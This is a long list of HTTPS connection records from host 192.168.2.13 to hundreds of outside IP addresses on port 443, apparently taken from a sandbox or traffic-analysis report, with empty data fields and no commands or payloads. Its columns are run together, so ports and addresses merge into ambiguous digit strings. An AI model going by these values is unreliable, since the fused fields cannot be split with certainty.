                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10855192.168.2.1341766161.140.0.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10856192.168.2.134218440.146.56.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10857192.168.2.135855863.193.250.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10858192.168.2.1355584201.68.95.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10859192.168.2.1343326188.227.88.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10860192.168.2.1360758156.40.89.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10861192.168.2.1352874157.182.146.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10862192.168.2.1348598130.48.194.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10863192.168.2.134650258.185.220.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10864192.168.2.1357170179.212.193.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10865192.168.2.1334166150.108.24.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10866192.168.2.1336250184.161.97.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10867192.168.2.1339824221.111.20.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10868192.168.2.136032291.102.229.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10869192.168.2.1338974182.84.210.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10870192.168.2.134253297.203.230.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10871192.168.2.133434217.81.92.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10872192.168.2.134595884.220.139.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10873192.168.2.133377485.101.80.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10874192.168.2.1357066219.15.12.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10875192.168.2.1351420103.126.20.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10876192.168.2.1338504132.16.149.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10877192.168.2.1350234201.181.172.165443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10878192.168.2.1360754162.21.67.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10879192.168.2.133993627.210.65.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10880192.168.2.1352648190.98.171.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10881192.168.2.1350990172.0.150.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10882192.168.2.135783262.73.246.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10883192.168.2.1334736219.84.191.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10884192.168.2.1351324142.150.232.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10885192.168.2.1359478144.254.180.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10886192.168.2.1355634155.236.219.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10887192.168.2.1358372175.214.106.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10888192.168.2.135250640.155.227.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10889192.168.2.1344934176.39.85.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10890192.168.2.1335030151.230.124.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10891192.168.2.1341074188.146.205.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10892192.168.2.1357100222.43.148.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10893192.168.2.1356080156.211.102.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10894192.168.2.134559461.240.117.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10895192.168.2.1354948158.104.22.225443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10896192.168.2.1360644167.164.234.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10897192.168.2.134440296.172.251.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10898192.168.2.1350104187.193.154.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10899192.168.2.135303464.40.225.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10900192.168.2.1343302188.162.171.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10901192.168.2.133779618.85.42.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10902192.168.2.1347004221.140.61.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10903192.168.2.1340972142.77.99.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10904192.168.2.1349190183.49.75.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10905192.168.2.134507024.147.100.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10906192.168.2.1334146170.99.74.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10907192.168.2.1338290204.208.65.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10908192.168.2.1335150160.75.83.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10909192.168.2.1346120146.92.212.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10910192.168.2.1354850124.232.72.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10911192.168.2.133427474.1.78.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10912192.168.2.134724661.202.9.70443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10913192.168.2.134943888.106.5.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10914192.168.2.1336078218.64.181.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10915192.168.2.135390439.38.164.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10916192.168.2.1341326200.51.1.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10917192.168.2.1333924221.27.250.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10918192.168.2.1342236217.101.234.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10919192.168.2.1347158188.20.11.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10920192.168.2.1350502143.77.165.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10921192.168.2.1337494163.88.83.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10922192.168.2.1335808153.243.231.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10923192.168.2.1333378207.28.200.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10924192.168.2.135548076.39.182.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10925192.168.2.135067477.37.128.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10926192.168.2.1348254122.108.173.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10927192.168.2.1335662163.93.188.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10928192.168.2.1354170149.152.34.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10929192.168.2.133300035.8.113.249443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10930192.168.2.135183813.95.253.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10931192.168.2.1346048131.54.64.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10932192.168.2.136001498.177.99.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10933192.168.2.1359698217.145.89.70443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10934192.168.2.1338144221.228.78.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10935192.168.2.1344826218.190.9.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10936192.168.2.1360564172.151.203.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10937192.168.2.1344860186.56.151.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10938192.168.2.133375684.170.91.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10939192.168.2.1359788126.85.88.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10940192.168.2.1343630195.200.92.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10941192.168.2.134007846.103.96.255443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10942192.168.2.1346734107.140.202.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10943192.168.2.1346748204.215.86.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10944192.168.2.135356839.27.149.31443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10945192.168.2.134652242.248.139.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10946192.168.2.1349584117.19.54.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10947192.168.2.1337116176.16.151.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10948192.168.2.133885640.33.247.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10949192.168.2.1352074118.26.228.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10950192.168.2.1346674172.73.198.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10951192.168.2.1342648103.131.43.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10952192.168.2.134085249.64.26.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10953192.168.2.1341748194.223.168.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10954192.168.2.1352776195.47.73.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10955192.168.2.1359838131.2.138.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10956192.168.2.133482035.110.252.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10957192.168.2.1359194178.68.144.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10958192.168.2.1349942199.96.41.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10959192.168.2.1336008186.112.24.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10960192.168.2.13596729.115.238.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10961192.168.2.1335240186.170.4.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10962192.168.2.133938687.182.72.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10963192.168.2.1335664217.165.105.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10964192.168.2.135979848.159.154.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10965192.168.2.134545294.205.66.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10966192.168.2.1348348106.15.219.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10967192.168.2.1333146151.151.61.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10968192.168.2.133632642.147.14.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10969192.168.2.1358014104.171.10.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10970192.168.2.1338718205.126.113.225443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10971192.168.2.133816265.83.184.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10972192.168.2.1340144221.184.107.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10973192.168.2.134978291.56.93.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10974192.168.2.1357292108.198.106.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10975192.168.2.1350346210.171.202.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10976192.168.2.134024882.176.196.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10977192.168.2.1356724194.62.102.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10978192.168.2.134793668.254.131.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10979192.168.2.1338602152.51.254.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10980192.168.2.133451843.248.128.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10981192.168.2.1343440221.82.135.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10982192.168.2.1355312167.150.208.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10983192.168.2.1348882149.223.217.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10984192.168.2.133299850.175.70.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10985192.168.2.1351748101.25.190.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10986192.168.2.135011286.125.92.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10987192.168.2.135591283.106.168.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10988192.168.2.134711463.162.241.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10989192.168.2.135460662.57.5.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10990192.168.2.1339940197.1.122.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10991192.168.2.1359522220.172.115.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10992192.168.2.134198465.56.82.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10993192.168.2.1344470218.66.139.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10994192.168.2.1355312116.54.179.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10995192.168.2.135516845.140.67.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10996192.168.2.1345192124.120.5.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10997192.168.2.1358222151.30.112.246443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10998192.168.2.133749869.13.143.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10999192.168.2.1357508102.188.22.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11000192.168.2.133334881.94.101.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11001192.168.2.1355894176.10.150.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11002192.168.2.134941471.101.36.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11003192.168.2.1333072103.232.74.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11004192.168.2.134320636.239.29.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11005192.168.2.1338954144.255.41.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11006192.168.2.1356880187.47.170.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11007192.168.2.1350436136.167.224.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11008192.168.2.135061268.141.3.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11009192.168.2.1335566140.102.70.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11010192.168.2.134612846.230.134.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11011192.168.2.1360420157.76.145.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11012192.168.2.1353576121.245.207.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11013192.168.2.135380463.68.210.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11014192.168.2.134108019.155.204.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11015192.168.2.1336890150.104.56.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11016192.168.2.1333658183.23.220.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11017192.168.2.135978417.82.152.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11018192.168.2.133758054.182.147.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11019192.168.2.1333684100.52.124.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11020192.168.2.134931081.70.236.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11021192.168.2.135012067.115.252.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11022192.168.2.135615897.191.237.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11023192.168.2.1349420131.69.113.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11024192.168.2.134324873.194.228.73443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11025192.168.2.1333116183.76.130.55443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11026192.168.2.134605466.210.183.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11027192.168.2.1354656188.138.146.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11028192.168.2.135703674.202.53.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11029192.168.2.1358276153.69.40.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11030192.168.2.135497889.246.50.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11031192.168.2.1342656140.130.209.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11032192.168.2.134915673.213.245.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11033192.168.2.1338314165.63.145.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11034192.168.2.1359332149.81.54.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11035192.168.2.1360354122.212.108.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11036192.168.2.1340992112.92.208.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11037192.168.2.1347916116.240.192.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11038192.168.2.133858261.244.239.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11039192.168.2.1334124154.145.112.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11040192.168.2.1351274101.144.189.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11041192.168.2.1341256213.89.12.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11042192.168.2.134673474.13.78.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11043192.168.2.134557235.148.89.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11044192.168.2.1346922155.233.59.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11045192.168.2.1356276160.250.170.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11046192.168.2.135249620.42.39.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11047192.168.2.13388788.92.15.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11048192.168.2.134537413.153.208.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11049192.168.2.1338046150.158.174.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11050192.168.2.135898487.191.103.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11051192.168.2.1346262164.231.26.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11052192.168.2.1348742178.68.88.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11053192.168.2.133983435.95.127.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11054192.168.2.136044689.222.25.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11055192.168.2.1348630170.251.215.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11056192.168.2.13599061.44.198.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11057192.168.2.134342661.188.10.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11058192.168.2.133675264.43.10.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11059192.168.2.1349090222.223.2.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11060192.168.2.135282817.172.11.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11061192.168.2.1356954187.38.185.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11062192.168.2.133287434.70.91.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11063192.168.2.133995467.244.238.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11064192.168.2.1352070142.164.84.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11065192.168.2.1346646195.152.204.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11066192.168.2.1357826178.172.250.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11067192.168.2.1348444188.88.110.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11068192.168.2.1356898163.9.205.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11069192.168.2.1346522211.5.11.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11070192.168.2.13572561.94.15.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11071192.168.2.134686874.104.122.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11072192.168.2.1346896222.107.35.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11073192.168.2.1343862196.242.109.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11074192.168.2.13504701.61.140.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11075192.168.2.135190823.28.8.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11076192.168.2.1356318168.254.237.99443
